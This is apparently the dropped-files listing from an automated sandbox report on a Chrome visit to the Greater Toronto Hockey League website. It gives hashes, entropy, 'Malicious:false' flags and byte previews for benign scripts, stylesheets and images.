                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF.............4ICC_PROFILE......$appl....mntrRGB XYZ ........... acspAPPL....APPL...........................-appl....%..M8.......................................desc.......ecprt...d...#wtpt........rXYZ........gXYZ........bXYZ........rTRC....... chad.......,bTRC....... gTRC....... desc........Display P3..................................................................................text....Copyright Apple Inc., 2017..XYZ .......Q........XYZ ..........=.....XYZ ......J....7....XYZ ......(8.......para..........ff......Y.......[sf32.......B.......&.......................n...C..............................................!........."$".$.......C............................................................................"................................................................................+>9./*X:.....[.3-p.5.V=.|....U.P....t3...~UP.gUH.]...Hf........1DD.2..@.^p.@.......... .F......``.....C..jA.Gc.0.|...z.W.&.c.l..s........e7H....j,).4...".12,.....I;...-..#....H,K
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (9959)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):10056
                                                                                                                          Entropy (8bit):5.308628526814024
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:kZrk/GNyd31svs7wkX8KzJcqSDdAcHX4YE5NLR:srhNyNO0kkMKzFSDdAcIYwLR
                                                                                                                          MD5:7121994EEC5320FBE6586463BF9651C2
                                                                                                                          SHA1:90532AFF6D4121954254CDF04994D834F7EC169B
                                                                                                                          SHA-256:48EB8B500AE6A38617B5738D2B3FAEC481922A7782246E31D2755C034A45CD5D
                                                                                                                          SHA-512:B74A2F03C64E883B9A34DE43690429327DFB4AA230A7A6AFCA8150A16E3D84E98461245FF264C26368D9904562CC34FE219F71F951D364FA5C68C039B76776CD
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://gthlcanada.com/wp/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
                                                                                                                          Preview:/*! jQuery Migrate v1.4.1 | (c) jQuery Foundation and other contributors | jquery.org/license */."undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(a,b,c){function d(c){var d=b.console;f[c]||(f[c]=!0,a.migrateWarnings.push(c),d&&d.warn&&!a.migrateMute&&(d.warn("JQMIGRATE: "+c),a.migrateTrace&&d.trace&&d.trace()))}function e(b,c,e,f){if(Object.defineProperty)try{return void Object.defineProperty(b,c,{configurable:!0,enumerable:!0,get:function(){return d(f),e},set:function(a){d(f),e=a}})}catch(g){}a._definePropertyBroken=!0,b[c]=e}a.migrateVersion="1.4.1";var f={};a.migrateWarnings=[],b.console&&b.console.log&&b.console.log("JQMIGRATE: Migrate is installed"+(a.migrateMute?"":" with logging active")+", version "+a.migrateVersion),a.migrateTrace===c&&(a.migrateTrace=!0),a.migrateReset=function(){f={},a.migrateWarnings.length=0},"BackCompat"===document.compatMode&&d("jQuery is not compatible with Quirks Mode");var g=a("<input/>",{size:1}).attr("size")&&a.attrFn,h=a.att
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):838
                                                                                                                          Entropy (8bit):4.670822471754643
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:2b7Ksen60AfVXF2ACfiVSApbE3zWlSabWH:C0A1gfMhG36YkWH
                                                                                                                          MD5:49CEA0A781874A962879C2CACA9BC322
                                                                                                                          SHA1:72C1650DE2B93EF320D2DB873FBB473FE360269C
                                                                                                                          SHA-256:57A50C99A31EF4E89E86664E96F6DFBDDE163A2EB96E88B3B492C49AA4BE2F37
                                                                                                                          SHA-512:7EBF5DA4637794CDAB0D199E8B0550E9230A1550804A4CE7FC723A8881E16D12327B9C40BCEECFF54ECE29DDE71BF41E63E8510ADF0827C4CD13C2392E6250A6
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://gthlcanada.com/app/plugins/tagged_content_blocks/public/js/tagged-content-blocks-public.js?ver=1.0.0
                                                                                                                          Preview:(function( $ ) {..'use strict';.../**.. * All of the code for your public-facing JavaScript source.. * should reside in this file... *.. * Note: It has been assumed you will write jQuery code here, so the.. * $ function reference has been prepared for usage within the scope.. * of this function... *.. * This enables you to define handlers, for when the DOM is ready:.. *.. * $(function() {.. *.. * });.. *.. * When the window is loaded:.. *.. * $( window ).load(function() {.. *.. * });.. *.. * ...and/or other possibilities... *.. * Ideally, it is not considered best practise to attach more than a.. * single DOM-ready or window-load handler for a particular page... * Although scripts in the WordPress core, Plugins and Themes may be.. * practising this, we should strive to set a better example in our own work... */..})( jQuery );.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):28
                                                                                                                          Entropy (8bit):3.950212064914748
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:WZoS8/ZYn:WZoS8/ZYn
                                                                                                                          MD5:C3F64CB2A8B00CBBC30CE2908208A29D
                                                                                                                          SHA1:E4AA7CAB67F4CF5FA52371DDC25A75AAFD4D0CCC
                                                                                                                          SHA-256:391601283994BCD9486160BF8A5637410D280E1BDDD3AEF5428454976E193E81
                                                                                                                          SHA-512:6CCBC26128FE65D6D313B965DA3D2E201D506442D0036404ABB490BE0FC99B3A0FDB611269B932DBA7F3A621E11F79ED213D2B11D487EE39C54A17D97A823552
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTI4LjAuNjYxMy4xMjASIAn3JLywVerB0hIFDZFhlU4SBQ2RYZVOIYTST3exXMZF?alt=proto
                                                                                                                          Preview:ChIKBw2RYZVOGgAKBw2RYZVOGgA=
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (2503)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):263007
                                                                                                                          Entropy (8bit):5.600042681433955
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:KAEF77If2J/KsQomzjXilLJNVLB9g+oksrq8Noy9UOj6x546yo9kgq8Ua/gW7N3I:KR77If2J/KdzjXilLJNVLXxoksrqTz5M
                                                                                                                          MD5:5CEDB8D0F4960B6B2E5D79018CC532DA
                                                                                                                          SHA1:DE78D85C1F4FFC65A3A0D7F0F877B52F1483626D
                                                                                                                          SHA-256:A4F7C13A106649A73BE3139A3965DDDDD747AE5A50020599B32B0FE2D6E06D52
                                                                                                                          SHA-512:A460AE4130F67B562E81A1D0099C8D7C14519565511680CEBF9452FE512921619F848156D3314E3636E3BA2F809CC32E42959DC0145503DE5906E2903041DDD6
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://www.googleadservices.com/pagead/managed/js/activeview/current/reach_worklet.js
                                                                                                                          Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var h=this||self,ba=function(a,b){a=a.split(".");var c=h;a[0]in c||typeof c.execScript=="undefined"||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||b===void 0?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b},p=function(a,b){a:{var c=["CLOSURE_FLAGS"];for(var d=h,e=0;e<c.length;e++)if(d=d[c[e]],d==null){c=null;break a}c=d}a=c&&c[a];return a!=null?a:b},q=function(a){var b=typeof a;return b!="object"?b:a?Array.isArray(a)?"array":b:"null"},ca=function(a){var b=q(a);return b==."array"||b=="object"&&typeof a.length=="number"},da=function(a){return a},ea=function(a,b){function c(){}c.prototype=b.prototype;a.Lc=b.prototype;a.prototype=new c;a.prototype.constructor=a;a.Ec=function(d,e,f){for(var g=Array(arguments.length-2),k=2;k<arguments.length;k++)g[k-2]=arguments[k];return b.prototype[e].apply(d,g)}};var fa={2784:1,"2032,20008":2,"2032,20009,20320001":3,"2032,20009":
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:GIF image data, version 89a, 300 x 250
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):114750
                                                                                                                          Entropy (8bit):7.957381083965845
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:LsCYtLpWdEFHu82Qmo7i8AraHBO22uBMAmvHqUb3AI1b69RQOTWmFIBFYIB2kqZQ:AMKOv6B1H022uRvs1b69uOvFNIHAaNf
                                                                                                                          MD5:4028A902FD738BCBFF571168CAC7CC91
                                                                                                                          SHA1:AEE0010CF53F7B0C25E781D889AFD48632F2F5F2
                                                                                                                          SHA-256:1CF2D38A87F7103759B0FB707593291F620B580F44ADBD79A4C689D4F75B732E
                                                                                                                          SHA-512:8D0C4E92CD180DA5FDDE6ABAF599BBE39AB6AC47FAC0CACFD6AE3CFAEA94CA47F1E222B4BBCE436CD38306B8499D53CAD0C7FBD67E3D26ABD3EFC681CFD07000
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/11/13195651/HHOF23_ShootSaveCall_300x250.gif
                                                                                                                          Preview:GIF89a,...................q........ ".....Ph......{...a-T....g.. O.........PLL:..U.....qll...)Y........yDm...nD0|...$.....k.........O4'...y......g.......vRH...}.....+,......hf. ...$.....7....iP......K...Z.....r......4...............'..|r...0. .0h....u.....j..'........~......Y....... .....623....Yh^..q..p`WCQu....B..............4#...0.........}f......\.$+@i....J..5.TB.!...3....-.'..wR..........CD....R{.......................T1.1..t..T....=.7...5-#.......-E<.H....5...........$........t..........1.e.........R.$$'.d...........I.....5.L#..D.....c.......*..Xa{....0i.......#.2.......V8.......7..U....._.V?.~...........k.}.......Pg.c..B.0.q...@..*."*8...........!.f..J....S..../../L.e.6.x..........9.n#....~......t.....|..J...................!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="h
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 320x280, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20946
                                                                                                                          Entropy (8bit):7.942152978394475
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:5buey5eRLAVg0GYUi2tVr7VGaUIyk6tQMukYFDRbde0kXMGOr1ICGwu/I2:57yULKg0GFtHGrrQMdY5pdnhrEH
                                                                                                                          MD5:5F5D41FB32402384828FD1A13EF1E79D
                                                                                                                          SHA1:5C8A22B1EF8F150E809A71C1202D2789B9013E80
                                                                                                                          SHA-256:B6C862D51A2D3883900DD34C68B5A03877E645C73A6F20E0C13D9E9986E4D50F
                                                                                                                          SHA-512:8714919B2B9B74ACBE7B05C8F44F3ACFA85468CF0FE977701C996E1643F4B39910CBE33B15909C65D7BBE6EEFFD2AF433959CDDFD0DA752B51A6423BF4634172
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF..............Exif..II*.................http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.9ccc4de93, 2022/03/14-14:07:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:88587f3c-b99f-4b42-91f3-05f6890f5c87" xmpMM:DocumentID="xmp.did:24325F90065211ED986E9E1E5945A856" xmpMM:InstanceID="xmp.iid:24325F8F065211ED986E9E1E5945A856" xmp:CreatorTool="Adobe Photoshop 23.4 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:c3ace56e-f103-4079-858d-c81068b26287" stRef:documentID="adobe:docid:photoshop:6379f9c4-1acf-dc4a-a9bc-043aab7e6fb0"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...C.....................................
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:data
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):6977
                                                                                                                          Entropy (8bit):7.972486285674198
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:wemdKEzGVkVfO7DYtyfvrKDS1w1u75vGRyPu:dVEqaVfO78YfuD3c5vGEu
                                                                                                                          MD5:9854E647A5E7DDF793CA7C49D8A1FC21
                                                                                                                          SHA1:730859A601D1D8DE5DF0A11D55EBD7BFAFEACA14
                                                                                                                          SHA-256:7D7C1A4B683F26B0D8D494EF05CE7DD0785FE215DA89BF22F0F6DE6576F9DF19
                                                                                                                          SHA-512:D2CF867990C5B05965A09A0993C749A254A5531C86833F4A5E9D96A31854A69A45A1961FDE12B120B00C174105D4DA2A4815C92DEF4D7C985D0183DCC23F0526
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css
                                                                                                                          Preview:..y.HM.....>.O.......=.c.s._..D...!lW.i.kY% S{...#..<;.b..e..`.....8.]V....TD.Z.u..l......Y........<rP..q`.CR...&2....'B..BL....~ip..c......._.~Z...UW.~`.......U.;NP.2.Y.]?}J\........W..|}.5....m..0......u.O.......Wvc....?]W....F...V?}J..&A..[?.P^.?.......|...C..7.:......y.O\u.......3...x...0.....W...~.....1.nXui...5.%....%F......;.......@Fn..)?..&.N..,.......wc..z..G....>..I..i......5....=?.@.........a/.O5.5.P..0._......x.0....X. .t./.......&......I`....-v.;.....xE.EnN.,/..].......y....f......Cv.5=..0..W.q......KvX.0^.A.;.K...dLz..{j..m..`...>lti87M...Lo.+.^.e......2.............!...7.7.M.[...K.._....qXV.w.........}.).6.3.....3.@.....6r.....}[...5......o.D.,6...M.;0..v...6...").$.#$...p|U......SL1R....+..*).2U.y.Dn.....~..8.|..y...so.....m.}..48..$.r.VP...8}|.j.n..........x...=wo...?..l.L.&QV..7Mx.x........~..`O...:.......q......7_.dm3Sz.&,G.Y.....L....*0..g.....u'z...4Z.C)S3n..-...].....1..........V....!}....wd.%v.2......*..q...Y
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (508)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2994
                                                                                                                          Entropy (8bit):5.002957444642147
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:+D1iwxsPpMcpindezq95HeHeNFX1QLjQkzEsyHMAstyIiMMcLAc1McLAz0Mym:+D1iwxsbpindezq95He+NFX1QLjQkzEb
                                                                                                                          MD5:029670A7D3E6425D72B01748A1B415B2
                                                                                                                          SHA1:784780A860AD42A983E370B34CA00BB1E17506F6
                                                                                                                          SHA-256:224546EE41F8AACC21CB2067284A16CE5FFFD04BBF79A5E4FC04C810DFE6CE67
                                                                                                                          SHA-512:1532D4B3CB731DBF3D4E969385272B9E4D5867286B31302093ACAEF8E4D93228C8421C8860B7C860AE9EF43512022CC40BA28BA384E8E6BC89F7BF3F7D0AA267
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:var poll_id=0,poll_answer_id="",is_being_voted=!1;pollsL10n.show_loading=parseInt(pollsL10n.show_loading);pollsL10n.show_fading=parseInt(pollsL10n.show_fading);.function poll_vote(b){jQuery(document).ready(function(a){is_being_voted?alert(pollsL10n.text_wait):(set_is_being_voted(!0),poll_id=b,poll_answer_id="",poll_multiple_ans_count=poll_multiple_ans=0,a("#poll_multiple_ans_"+poll_id).length&&(poll_multiple_ans=parseInt(a("#poll_multiple_ans_"+poll_id).val())),a("#polls_form_"+poll_id+" input:checkbox, #polls_form_"+poll_id+" input:radio, #polls_form_"+poll_id+" option").each(function(b){if(a(this).is(":checked")||a(this).is(":selected"))0<poll_multiple_ans?..(poll_answer_id=a(this).val()+","+poll_answer_id,poll_multiple_ans_count++):poll_answer_id=parseInt(a(this).val())}),0<poll_multiple_ans?0<poll_multiple_ans_count&&poll_multiple_ans_count<=poll_multiple_ans?(poll_answer_id=poll_answer_id.substring(0,poll_answer_id.length-1),poll_process()):0==poll_multiple_ans_count?(set_is_being
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):657
                                                                                                                          Entropy (8bit):7.591810933211077
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:6v/7kO/6TE1e2GxvixoW3Qz9Ws7xDfS+dc63A4QWfRq6KogMyq/Ezp+sm7:S/6QMMCz9WsFf7X5fRwIP/Ez4p
                                                                                                                          MD5:CA52040004058032766383AD85952220
                                                                                                                          SHA1:94C03000D3EC37489E95C45CD42619DB9B46E20F
                                                                                                                          SHA-256:B0B4656A158D609046BA175F0CB787875BA95BED112B65ED02EDEE08BE99DFD8
                                                                                                                          SHA-512:894754AEA62EEB791F0F6510197FFA7F00964A994E160D23ED1E2B4075F45B1C80A75CDAC522D7438F227971A4F52F77717B87279C3CFA76FD757A07A2B6467D
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/08/29093927/icons8-youtube-48-1.png
                                                                                                                          Preview:.PNG........IHDR...0...0.....W.......pHYs................CIDATx..k.Q..O"&."..bck..E@...$j."b!i,,.._`i'BD...?.".F.Q..1.P....J....q.F.#w.YtI......?8....=.;3...p8..........6..n*.S1@............K0G.}...\7.<...._.(..8..6clEkr.@=.}.LQQ(..........g~=.(.L.4..5.ay.....0...D3.&..d.0+4.6....3.f...#J...."..Ey..S7.............C.f.r.....b.1O^.".V...$J.....~ .N.......P... ..#..v......&....b...H.].,D......U..0...>M.l\Z.-h........yC.._..Vg#..k.dw....<?BE.`Yz/....g..k+...|.?.....d.....-d..5.J4.1.e..f....o.m.,..x....|.h<...H...?..(..aV.<b5...3`..L.2Nc....Qq ...M......` A....n*.Sq...*.Pp..T.-7q..].....w..Zj.._[..Js..p8....S.IS.U.....IEND.B`.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 240x240, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=10, manufacturer=Canon, model=Canon EOS 5D Mark IV, xresolution=162, yresolution=170, resolutionunit=2, software=Adobe Lightroom 8.0 (Macintosh), datetime=2024:11:07 11:51:21], baseline, precision 8, 730x487, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):96174
                                                                                                                          Entropy (8bit):7.812701193033291
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:QbDF4ym6mOkQcvbYKMZF4qbxF0iy8ikInI0AsskGh2L3rtwhNSLDtuQ1yk:Q/rm6mGJUqVbRIIbJ0RwHkb7
                                                                                                                          MD5:7F8E9AED6E8C1B57E7C6D54A3D235971
                                                                                                                          SHA1:6B94A1E21E62BA2F18DC6FFE69853CFE2C2D175A
                                                                                                                          SHA-256:88C6E22E7303CC149590718432163C321B761EED21DAFBD5130EBAB3A43E969E
                                                                                                                          SHA-512:6A610FDEAB7AFB3E7C56E5DCD6264F0891D2178835DF495C90896C292CFBBDD01C355A1C3E4BC1C4F93AB8F9229FB842D23627808EE3B3D71AB29CAA2A1E3796
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF............9.Exif..II*.......................................................(...........1... .......2...........;.......................i...........d...Canon.Canon EOS 5D Mark IV..................Adobe Lightroom 8.0 (Macintosh).2024:11:07 11:51:21.ALEX TE.ALEXJSTE..!........................."...........'...........0...........2...................0231........................................................................................................................................................00..........00..................................................................................................1...........2....... ...4.......@...5.......X.......................2024:11:03 11:07:59.2024:11:03 11:07:59.-05:00..-05:00..-05:00..X.y.@B...T-.@B..................F.........f......\D.....192156000129..........F.......................EF24-70mm f/2.8L II USM.1517002438........................................(...............................?5..............................
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CC 2019 (Macintosh), datetime=2021:07:17 00:12:48], baseline, precision 8, 730x365, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):19915
                                                                                                                          Entropy (8bit):6.646330506112449
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:HfyqsHabEYNMtKwTDknWrg/g4X1XFJRJy4a4vKRVvSjajWd1PdKHQx7DwMyo1jKO:iYNg7Enq0JNFJRJFa4mtmlmQx7hyfy
                                                                                                                          MD5:4FA3EB7376BCD47BD40D24B15FDF99F4
                                                                                                                          SHA1:4C85709D56F9DA3EA9243FFA7624CAFF1EDB4FB0
                                                                                                                          SHA-256:6D2681126F64029C9FCD345FA4B2F4A009D7BDB6536DFBA287F6454A1F39F6EF
                                                                                                                          SHA-512:75A0B10F1C0084714100F2566543A8F16587E78020ABDFCA068A595AEC59F2E4AB115CA559BB9696521A2F87D59EDF44D443D8052E83180812F919CEFB626C03
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF.....,.,.....AExif..MM.*.............................b...........j.(...........1.....$...r.2...........i.................,.......,....Adobe Photoshop CC 2019 (Macintosh).2021:07:17 00:12:48........................................................................&.............(.....................6...................,.......,..........Adobe_CM......Adobe.d.................................................................................................................................................P...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$.R.I$...I%)$.IJI$.R.I$...I%)$.IO...T.I%)$.IJI$.R.I$..;...2.v.i}.=.....5+o...u....]{...A-.....Ey.......-......_M>
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1024x200, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):64482
                                                                                                                          Entropy (8bit):7.950790943186919
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:DBPWgdpl1SCIZSBHYG8JJHuLM8Fh1zLvDXnkJbaJ3NMP:tpSCI0d8JJHurznnrJ3a
                                                                                                                          MD5:02B9B75E50891266ABDBB5C111155A82
                                                                                                                          SHA1:E25344AD78E28BEC4650C4B369294BE4C2038B8A
                                                                                                                          SHA-256:8BD57B7E56D3EA41E1970F3B51CB918B4D9831381C37446C1CF89E5165CBB422
                                                                                                                          SHA-512:DEBEEAD9D07F879AF38E9411DD4319EB5B8AF550C1FF79BC5F1FB4A1952D8CB8E9F6A2C063423A67C0642AB15359F963AA3300B086C372523A6A3414D576E9B0
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF..............Exif..II*.................http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocumentID="xmp.did:3040A176ED2068118083B7D82882DAD4" xmpMM:DocumentID="xmp.did:47EDFB11811E11E7B725C6949D8C794F" xmpMM:InstanceID="xmp.iid:47EDFB10811E11E7B725C6949D8C794F" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:B81299D8CF2068118C149F284D654366" stRef:documentID="xmp.did:3040A176ED2068118083B7D82882DAD4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket e
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):17198
                                                                                                                          Entropy (8bit):6.017188394639125
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:6uhdqWmubyFQUGFu9uF91RgTQkp5nGOmxBr94vuxp:nFmdNuuM91+skp5nGh94vuxp
                                                                                                                          MD5:00CCAE146E97A8C221BA464B06641802
                                                                                                                          SHA1:4984BC7EBF2061AB3725230ABE64D2E80CA32E8A
                                                                                                                          SHA-256:88BED1627EE94943569755A4D1777C14FB387639DB89D444FF857CB2CF69F375
                                                                                                                          SHA-512:D403A5F89FB3D41A64214C75CE8B3CF0A66F9692E1999BC271A55E97C751F39A823EF3EC03DC3893939AE72F545C446805B911AA48F166B35067DE476BFBA142
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:{"sodar_query_id":"JH-FZ5aJDoGF2NoPlYfRqQ8","injector_basename":"sodar2","bg_hash_basename":"jQN_tiOKdJuWkTnZn4oDsZoaZomZcjYfSwgPAXYkMcw","bg_binary":"bUwq+A0Fcvxhj3JeU4INeXWRvEBjyzSB4KUPNOPvykd17OJCfuCRpWpSzCIfYWmff5AFRfIl7l+xTPYusvRiRUShwzWo+RLrMTO3FeqP0jnSclDoaiEXOKZZ/N0KW8K39R5RZDXHIeKF0SFDZQ5t7q869lWS5FVO9mQ1yEEeBOuYE8UgB8v/2PcQ7409iWJeibeD1AAvyQD6IiaI6hJS/vEDXfSGCKvgKHsbjJtPJFlE/S+waLsukUl0iFwnZT4BrMmNHkSY6slWMMFYTWbDHz3DI0nfiyw5kGwc15IJ+xN5VtDKe5RIvRskxGiV5gQJeMO+Wp7PfL5oikoDiTASpWEyUJnYpS23BxWDMPIaGoyVTawr+XNZU1pgApVhpGG/53CNc7D+QA9TwOTFW9DuZ6Er5zquupG8AGIex+l4cbNKJA0nS9/zD768Blaz9kUOzO1Rkv2O/xn8QzE4jXuD3UISI589iJLpuDFp2tTMgh+whJi6ok40Cb63MtfP2esqFIaLv6DJI9OxrlZHUSJJGlCe2Xo2xlBTud7H0fLFnXvhOsfwmwFdR14h9IdsocrgatVuqiVy/O2vS+2D29gfAzdOQoBVHz0I38Djem6B7VCeQIweJ3jeKqNXci8PsvJ5oGCz82pMDQLuc0hQzg4tIpTiN5BNjdNtpwYAFqPSBRePRs3uAZnfadE2xy9pkSwFZVHnrvYVULekqOpmGFPCCUuf2Uhe9sEfUwfcsRegnemuhXzcVC1wWO1J0opleLtYki0SASK8egEWki1w37wDBhYppi4knHJDbaG3FaHax/W1kNIXqjnSZIVXr2ln92dxwpvrJN7UTryxjYYDM
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 38x38, segment length 16, baseline, precision 8, 730x411, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):122864
                                                                                                                          Entropy (8bit):7.9631275387014036
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:eO0kD1awla34/tM4nOZAGeg7mPoT1stYqJlym3NWeE:NprzlMwKAGeg7RT1st/7ym3geE
                                                                                                                          MD5:9C4B1656FD7092D4480B8FA028B98BF8
                                                                                                                          SHA1:C541E8A78B68451819548D6A64D7E37808475466
                                                                                                                          SHA-256:BE536112133E8CAE9BDA79D08C7C68540A3566A656B1CD2BDACDC67CBBE92318
                                                                                                                          SHA-512:BD56D560DD0B0455821015A3AD115A57F30755B96B1A129831B3B9D61DDA457EB8445B0D2E8EBD885599ACA02E25D9C7D832340F65D828935AE20AF15C702C40
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/12/20145510/U10-A-Applewood-Coyotes-GTHL-Community-730x411.jpg
